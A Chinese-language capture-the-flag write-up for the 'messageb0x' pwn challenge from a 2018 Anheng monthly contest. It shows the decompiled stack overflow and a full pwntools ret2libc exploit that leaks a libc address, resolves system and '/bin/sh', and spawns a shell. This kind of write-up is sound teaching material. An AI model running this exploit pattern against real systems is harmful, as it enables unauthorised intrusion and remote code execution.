2018 -12月份 安恒月赛 pwn

Messageb0x

$ file messageb0x 
messageb0x: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=d932d2afbca74b57908822f22041237e233d4733, not stripped
$ checksec messageb0x 
[*] '/home/hu/Documents/comp/anheng/messageb0x'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

直接可以32位rop

  char v1; // [esp+0h] [ebp-58h]
  char v2; // [esp+32h] [ebp-26h]
  char s; // [esp+46h] [ebp-12h]

  puts("--> Plz tell me who you are:");
  fgets(&s, 10, stdin); //无法覆盖ret
  printf("--> hello %s", &s);
  puts("--> Plz tell me your email address:");
  fgets(&v2, 20, stdin); //无法覆盖ret
  puts("--> Plz tell me what do you want to say:");
  fgets(&v1, 200, stdin); //可以覆盖ret，可以利用
  puts("--> Here is your info:");
  puts(&v1); 
  return puts("--> Thank you !");

可以看出里面有write函数和puts函数可以用来leak libc

step1

构造一个print 函数，用来泄露 libc

def prin(fun_got):
    s= 'a'*1
    p.sendlineafter('--> Plz tell me who you are:\n',s)
    v2 ='a'*1
    p.sendlineafter('--> Plz tell me your email address:\n',v2)
    v1 = 'a'*(0x58+4)+p32(elf.plt['puts'])+p32(proc)+p32(fun_got)
    p.sendlineafter('--> Plz tell me what do you want to say:\n',v1)
    p.recvuntil('--> Thank you !\n')
    fun_lib =p.recv(4).ljust(4,'\x00')
    
    print(u32(fun_lib))
    return(u32(fun_lib))
start_lib = prin(elf.got['__libc_start_main'])

print(hex(start_lib))

step2

得到system 和 /bin/sh

libc = LibcSearcher('__libc_start_main',start_lib)
libc_base = start_lib - libc.dump('__libc_start_main')
system = libc_base + libc.dump('system')
binsh  = libc_base + libc.dump('str_bin_sh')
print('system=',p32(system),'binsh=',p32(binsh))

step3

getshell

s = 'a'
p.sendlineafter('--> Plz tell me who you are:\n',s)
v2 ='a'
p.sendlineafter('--> Plz tell me your email address:\n',v2)
v1_ = 'a'*(0x58+4)+p32(system)+p32(0)+p32(binsh)
p.sendlineafter('--> Plz tell me what do you want to say:',v1_)
p.recvuntil('--> Thank you !')
p.interactive()

完整exp

from pwn import *
from LibcSearcher import *
context.log_level='debug'
elf = ELF('./messageb0x')
p=process('./messageb0x')
#p =remote("101.71.29.5",'10009')

proc = 0x0804923B
##############leak######################
def prin(fun_got):
    s= 'a'*1
    p.sendlineafter('--> Plz tell me who you are:\n',s)
    v2 ='a'*1
    p.sendlineafter('--> Plz tell me your email address:\n',v2)
    v1 = 'a'*(0x58+4)+p32(elf.plt['puts'])+p32(proc)+p32(fun_got)
    p.sendlineafter('--> Plz tell me what do you want to say:\n',v1)
    p.recvuntil('--> Thank you !\n')
    fun_lib =p.recv(4).ljust(4,'\x00')
    
    print(u32(fun_lib))
    return(u32(fun_lib))


start_lib = prin(elf.got['__libc_start_main'])

print(hex(start_lib))
##############get-libc and system binsh###############
libc = LibcSearcher('__libc_start_main',start_lib)
libc_base = start_lib - libc.dump('__libc_start_main')
system = libc_base + libc.dump('system')
binsh  = libc_base + libc.dump('str_bin_sh')
print('system=',p32(system),'binsh=',p32(binsh))




##################get shell#############################
s = 'a'
p.sendlineafter('--> Plz tell me who you are:\n',s)
v2 ='a'
p.sendlineafter('--> Plz tell me your email address:\n',v2)
v1_ = 'a'*(0x58+4)+p32(system)+p32(0)+p32(binsh)
p.sendlineafter('--> Plz tell me what do you want to say:',v1_)
p.recvuntil('--> Thank you !')
p.interactive()

整个流程不难
但是自己还是踩了坑
p.recvuntil(’–> Thank you !\n’)
之前一直忘记了一个\n，得到的结果是0xd595400a，而正确的结果是0xf7d45540，多余的0a使得我leak的地址一直出错，
得不到对应的libc版本。
pwn这个活一定要细，1%的错误也会导致自己100%失败